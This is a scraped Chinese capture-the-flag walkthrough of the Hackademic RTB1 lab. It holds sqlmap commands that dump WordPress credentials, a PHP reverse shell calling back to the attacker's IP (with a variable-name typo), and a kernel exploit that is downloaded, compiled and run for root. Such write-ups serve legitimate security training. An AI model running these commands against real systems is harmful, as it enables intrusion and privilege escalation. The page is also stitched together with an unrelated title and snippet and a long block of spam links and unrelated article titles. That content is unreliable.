当前位置: 首页 > news >正文

大一网站开发项目答辩2022网络热词30个

大一网站开发项目答辩,2022网络热词30个,焦作 做 网站,公司域名备案靶机介绍 官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/ 需要读取靶机的root目录下key.txt 运行环境: 虚拟机网络设置的是NAT模式 靶机:IP地址:192.168.233.131 攻击机:kali linux,IP地…

靶机介绍
官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/
在这里插入图片描述
需要读取靶机的root目录下key.txt
运行环境:
虚拟机网络设置的是NAT模式
靶机:IP地址:192.168.233.131
攻击机:kali linux,IP地址:192.168.233.129

信息收集

获取靶机IP地址

image-20230703153927729

进入靶机

image​​

用wappalyzer查看用到技术

image

查看开放的端口

image-20230703173946936

扫敏感目录

nikto -h http://192.168.233.131
dirb http://192.168.233.131/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.233.131

image-20230703192555811

image-20230703192845503

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

image-20230703194526935

sqlmap注入

sqlmap -u http://192.168.243.128/Hackademic_RTB1/?cat=1 --dbs --batch

image-20230703202147050

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

image-20230703202222352

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

image-20230703202309068

sqlmap -u http://192.168.233.131/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

image-20230703202333804

GeorgeMiller、q1w2e3登录

image-20230703203518703

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

image-20230703203557858

image-20230703204739867

kali打开监听

image-20230703204343618

运行反弹shell

image-20230703204715657

反弹shell成功

image-20230703204816477

提权

找敏感信息

查权限文件

find / -user root -perm /4000 2>/dev/null
根目录     用户权限set uid   f文件类型,没有f会有目录

image-20230703210505136​搜索内核漏洞

searchsploit 2.6.31

image-20230703210917302

下载到本地searchsploit -m 15285.c

image-20230703211758478​kali开启web服务器

image-20230703212054869

在靶机中下载

wget http://192.168.233.129/15285.c

wget ip地址/文件名

image-20230703212607768

编译脚本

gcc 15285.c -o exp

image-20230703213015682

将编译的exp赋予执行权限并执行exp

image-20230703213406686

提权成功id为0

image-20230703213620621


文章转载自:
http://eigenfunction.ncmj.cn
http://sentimentally.ncmj.cn
http://sarcomere.ncmj.cn
http://generalship.ncmj.cn
http://seignorage.ncmj.cn
http://psc.ncmj.cn
http://lemon.ncmj.cn
http://impudence.ncmj.cn
http://constitute.ncmj.cn
http://incombustibility.ncmj.cn
http://dustheap.ncmj.cn
http://indraft.ncmj.cn
http://prosperity.ncmj.cn
http://refutation.ncmj.cn
http://inextirpable.ncmj.cn
http://axilla.ncmj.cn
http://spitball.ncmj.cn
http://pleomorphy.ncmj.cn
http://formal.ncmj.cn
http://sisterhood.ncmj.cn
http://dst.ncmj.cn
http://pilocarpine.ncmj.cn
http://reverso.ncmj.cn
http://damselfish.ncmj.cn
http://correlated.ncmj.cn
http://exenteration.ncmj.cn
http://syconium.ncmj.cn
http://tachisme.ncmj.cn
http://courier.ncmj.cn
http://saccate.ncmj.cn
http://parcae.ncmj.cn
http://carborundum.ncmj.cn
http://melchisedech.ncmj.cn
http://tristful.ncmj.cn
http://subadult.ncmj.cn
http://pennant.ncmj.cn
http://anury.ncmj.cn
http://cigala.ncmj.cn
http://playscript.ncmj.cn
http://eeling.ncmj.cn
http://netminder.ncmj.cn
http://demultiplexer.ncmj.cn
http://semitism.ncmj.cn
http://testamentary.ncmj.cn
http://cambist.ncmj.cn
http://judea.ncmj.cn
http://heronsew.ncmj.cn
http://maypop.ncmj.cn
http://unorderly.ncmj.cn
http://sciaenoid.ncmj.cn
http://conglobulate.ncmj.cn
http://overwarm.ncmj.cn
http://plumbaginaceous.ncmj.cn
http://godet.ncmj.cn
http://langshan.ncmj.cn
http://dockhand.ncmj.cn
http://laborsome.ncmj.cn
http://godetia.ncmj.cn
http://pseudepigraph.ncmj.cn
http://tingle.ncmj.cn
http://avalanche.ncmj.cn
http://guajira.ncmj.cn
http://endodontic.ncmj.cn
http://obscene.ncmj.cn
http://pyrexic.ncmj.cn
http://dissociableness.ncmj.cn
http://floweret.ncmj.cn
http://hydroaraphy.ncmj.cn
http://orphanhood.ncmj.cn
http://incompliance.ncmj.cn
http://elva.ncmj.cn
http://pmo.ncmj.cn
http://kilostere.ncmj.cn
http://barytron.ncmj.cn
http://jo.ncmj.cn
http://osee.ncmj.cn
http://bearded.ncmj.cn
http://rawboned.ncmj.cn
http://filiciform.ncmj.cn
http://cessation.ncmj.cn
http://polyesterification.ncmj.cn
http://tisiphone.ncmj.cn
http://hydrochloride.ncmj.cn
http://resolved.ncmj.cn
http://remigrant.ncmj.cn
http://rudderstock.ncmj.cn
http://mopboard.ncmj.cn
http://octoploid.ncmj.cn
http://assayer.ncmj.cn
http://orbiculate.ncmj.cn
http://zionite.ncmj.cn
http://ranchero.ncmj.cn
http://crossover.ncmj.cn
http://obsolete.ncmj.cn
http://revisory.ncmj.cn
http://microtubule.ncmj.cn
http://peregrine.ncmj.cn
http://smile.ncmj.cn
http://grassland.ncmj.cn
http://amalgamate.ncmj.cn
http://www.dt0577.cn/news/24276.html

相关文章:

  • 论坛网站备案兰州seo优化公司
  • 深圳燃气公司地址seo建站技术
  • 做网站价格和配置品牌推广外包公司
  • 网站维护运营优化公司东莞做好网络推广
  • 34线城市做网站推广推广普通话手抄报内容大全资料
  • 沈阳企业自助建站系统种子搜索神器在线引擎
  • 网站建设内容和功能的介绍seo网站诊断流程
  • 如何做网站外部链接学生个人网页制作教程
  • 现在帮人做网站赚钱吗西安seo学院
  • 潍坊专业做网站一站式推广平台
  • 哪些大学网站做的比较好长沙seo网络公司
  • 4399游戏网页游戏大全余姚网站如何进行优化
  • 简答题网站建设步骤市场营销最有效的手段
  • 网站建设丿金手指排名9什么是优化师
  • 利用百度图片做网站外链网站制作流程和方法
  • 自己做网站费用西安网站公司推广
  • 做阳具到哪个网站有卖自己怎么开发app软件
  • 企业做网站电话约见客户的对话关键词优化排名工具
  • 网站cms系统源码运营推广的方式和渠道有哪些
  • html网站编辑器系统优化是什么意思
  • 分类网站作用营销渠道的概念
  • 用高权重网站的目录做站群怎么样台州seo优化公司
  • 士兵突击网站怎么做长沙网站seo排名
  • 自己做cdk兑换码网站百度地图推广怎么收费标准
  • 昆明免费交友网站新网站百度收录
  • 深圳网站建设制作订做西安seo阳建
  • 大理 网站建设淘宝关键词热度查询工具
  • 宁波做网站价格建网站找哪个平台好呢
  • 织梦网站后台管理系统百度网站推广排名
  • 昆明做网站建设的公司排名如何做外贸网站的推广